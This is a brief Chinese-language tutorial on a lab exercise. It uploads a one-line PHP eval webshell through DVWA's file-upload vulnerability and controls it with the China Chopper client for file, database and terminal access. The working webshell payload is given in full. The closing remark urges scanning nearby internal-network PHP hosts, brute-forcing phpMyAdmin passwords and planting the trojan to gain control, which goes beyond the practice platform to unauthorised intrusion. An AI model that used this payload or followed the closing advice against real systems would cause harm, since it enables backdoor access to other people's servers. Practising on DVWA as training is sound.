通过木马对上传漏洞进行上传,从而侵入到系统
实验准备:
DVWA漏洞演练平台,浏览器,中国菜刀
1.新建PHP文件
新建一个PHP文件,内容为:<?php @eval($_POST['pass']) ?>
2.上传木马
在DVWA下的上传(upload)上上传新建的PHP文件
3.中国菜刀
打开中国菜刀,把木马上传路径添加到工具上,网址加上传路径,游记网址,进入文件管理(可进行文件管理,数据库管理,虚拟终端或运行自写脚步)
4.玩完之后记得删除上传的PHP文件,删掉后便无法访问。
注:可扫描附近搭建的PHP环境(内网),猜测用户名密码或者爆破PHPmyadmin,上传木马文件获得权限